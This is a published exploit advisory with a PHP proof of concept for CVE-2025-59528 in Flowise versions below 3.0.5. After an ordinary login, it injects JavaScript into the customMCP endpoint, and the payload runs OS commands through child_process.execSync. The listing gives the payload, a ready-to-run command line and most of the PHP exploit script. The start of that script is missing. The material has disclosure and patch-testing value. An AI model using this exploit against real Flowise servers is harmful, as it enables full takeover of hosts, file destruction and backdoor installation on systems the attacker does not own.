=============================================================================================================================================
| # Title : Flowise 3.0.4 - Authenticated Remote Code Execution via customMCP JavaScript injection (PHP PoC)
| # Author : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)
| # Vendor : https://github.com/FlowiseAI/Flowise
=============================================================================================================================================

[+] Summary :

FlowiseAI versions **below 3.0.5** contain a critical remote code execution (RCE) vulnerability in the endpoint:

    /api/v1/node-load-method/customMCP

The original write-up calls this an "authentication-bypass" RCE, but the PoC below requires a valid login: any account is sufficient, so treat it as a post-authentication bug that needs no special privilege. After logging in, an attacker can submit arbitrary JavaScript as the customMCP node configuration. The server evaluates that JavaScript; the PoC payload then calls Node.js's `child_process.execSync()` to run an OS command with the privileges of the Flowise process.

This allows (subject to the privileges and any container/sandbox boundaries of the Flowise process):
- Full OS command execution
- Full takeover of the host machine
- Arbitrary file modification / deletion
- Backdoor installation

[+] References : ( https://packetstorm.news/files/id/211130/ & CVE-2025-59528 )

[+] Technical Details

The exploit abuses the `listActions` load method of the **customMCP** node, which evaluates the user-supplied `mcpServerConfig` input as JavaScript instead of parsing it as data:

```javascript
({x:(function(){
    const cp = process.mainModule.require("child_process");
    cp.execSync("COMMAND_HERE");
    return 1;
})()})
```

When this string is sent as `inputs.mcpServerConfig` (with `loadMethod` set to `listActions`) in the JSON body of:

    POST /api/v1/node-load-method/customMCP

Flowise evaluates the payload in the backend, giving full system control. Note that the payload returns `1` rather than the command's output, so execution has to be confirmed through a side effect of the chosen command (for example a file it creates or a callback it makes).

1. Save the file as: poc.php
2. Execute: php poc.php email@example.com "Password123" http://TARGET:3000 "id"

Only run this against systems you are authorised to test.

[+] POC

[Note: this copy of the listing is truncated at the start. The opening PHP tag, the `banner()` definition and the beginning of the `login()` function, which builds the JSON login body from `$email` and `$password`, are missing; the code resumes in the middle of `login()`.]

$email, "password" => $password ]); $opts = [ "http" => [ "header" => "Content-Type: application/json\r\n" . 
"x-request-from: internal\r\n", "method" => "POST", "content" => $data, "ignore_errors" => true ] ]; $context = stream_context_create($opts); $result = file_get_contents($endpoint, false, $context); $cookies = ""; foreach ($http_response_header as $header) { if (stripos($header, "Set-Cookie:") !== false) { $cookies .= trim(substr($header, 11)) . "; "; } } return $cookies; } function exploit($email, $password, $url, $cmd) { $cookies = login($email, $password, $url); if (!$cookies) { echo "[✖] Login failed.\n"; return; } $endpoint = rtrim($url, '/') . "/api/v1/node-load-method/customMCP"; $payload = '({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("'.$cmd.'");return 1;})()})'; $postData = json_encode([ "loadMethod" => "listActions", "inputs" => ["mcpServerConfig" => $payload] ]); $opts = [ "http" => [ "header" => "Content-Type: application/json\r\n" . "Cookie: $cookies\r\n", "method" => "POST", "content" => $postData, "ignore_errors" => true ] ]; $context = stream_context_create($opts); file_get_contents($endpoint, false, $context); echo "[✔] Command executed: $cmd\n"; } banner(); if ($argc < 5) { echo "Usage: php {$argv[0]} \n"; echo "Example:\n"; echo "php {$argv[0]} admin@test.com 'Pass@2025' http://localhost:3000 'id'\n"; exit; } $email = $argv[1]; $password = $argv[2]; $url = $argv[3]; $cmd = $argv[4]; exploit($email, $password, $url, $cmd); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================